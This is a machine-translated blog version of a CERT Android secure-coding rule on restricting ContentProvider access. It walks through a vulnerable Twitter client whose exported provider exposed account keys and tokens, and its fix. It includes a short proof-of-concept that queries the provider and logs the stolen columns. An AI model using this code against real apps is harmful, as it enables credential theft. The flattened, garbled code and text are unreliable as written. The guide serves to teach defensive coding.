"Secure programming in the Android platform" の#01-limits the accessibility of app-sensitive ContentProvider

This article is translated from Https://www.securecoding.cert.org/confluence/display/java/DRD01-J.+Limit+the+accessibility+of+an +app%27s+sensitive+content+provider, there are additional deletions.

The ContentProvider class provides a mechanism for managing and sharing data with other apps. When sharing provider data with other apps, you must carefully implement access control to prevent unauthorized access to sensitive data.

There are three ways to restrict access to ContentProvider:

Public

Private

Restricted Access

[Public]

Declaring the android:exported attribute in the Androidmanifest.xml file, ContentProvider can be made public to other apps, Android API level 16 Earlier, ContentProvider is public by default unless explicitly declared android:exported= "false", for example:

<provider android:exported= "true" Android:name= "Mycontentprovider" android:authorities= " Com.example.mycontentprovider "/>

If ContentProvider is set to public, the data stored in ContentProvider can be accessed by other apps. Therefore, the design must ensure that only non-confidential information is disclosed.

[Private]

Declare the Android:exported property in the Androidmanifest.xml file, and you can set the ContentProvider to private. From Android API level 17 and later, ContentProvider is private by default and does not need to be explicitly declared, for example:

<provider android:exported= "false" Android:name= "Mycontentprovider" android:authorities= " Com.example.mycontentprovider "/>

If ContentProvider does not need to share data with other apps, declare android:exported= "false" in the manifest file, noting that at API Level 8 and earlier, Even if you explicitly declare android:exported= "false", the corresponding contentprovider can be accessed by other apps.

[Restricted Access]

Not to be continued

[Code examples that do not meet security requirements]

Movatwitouch, a Twitter client that uses ContentProvider to manage Twitter users ' key,secret and access tokens, but this contentprovider is public, This makes it possible for other apps installed on the same phone to get these sensitive information.

The provider declaration in the following androidmanifest.xml file does not specify the android:exported attribute, so the ContentProvider is public before API level 16.

<provider android:name= ". Content. Accountprovider "android:authorities=" Jp.co.vulnerable.accountprovider "/>

[Proof of concept]

The following code shows how the public's ContentProvider vulnerability can be exploited

Check whether Movatwi is installed.try {applicationinfo info = Getpackagemanager (). Getapplicationinfo ("Jp.co.vulnera Ble ", 0); [CJL5]}  catch (Namenotfoundexception e) {LOG.W (TAG, "the app is not installed."); return;} Extract account data through content Provideruri URI = uri.parse ("Content://jp.co.vulnerable.accountprovider"); Cursor cur = getcontentresolver (). Query (URI, NULL, NULL, NULL, or NULL); [CJL6]  StringBuilder sb = new StringBuilder (); if (cur! = null) {int RI = 0;    while (Cur.movetonext ()) {++ri;    LOG.I (TAG, String.Format ("row[%d]:", RI));    Sb.setlength (0);      for (int i = 0; i < Cur.getcolumncount (); ++i) {String column = Cur.getcolumnname (i);      String value = cur.getstring (i);      if (value = null) {value = Value.replaceall ("[\ r \ n]", "");    } log.i (TAG, String.Format ("\t%s:\t%s", column, value)); }}} else {log.i (TAG, "Can ' t get the app information.");}

[Solutions]

In the Androidmanifest.xml file, explicitly declare ContentProvider as

Android:exported= "false" <provider android:name= ". Content. Accountprovider "android:exported=" false "android:authorities=" Jp.co.vulnerable.accountprovider "/>

--Welcome reprint , please specify the source   http://blog.csdn.net/asce1885   do not use for commercial purposes without my consent--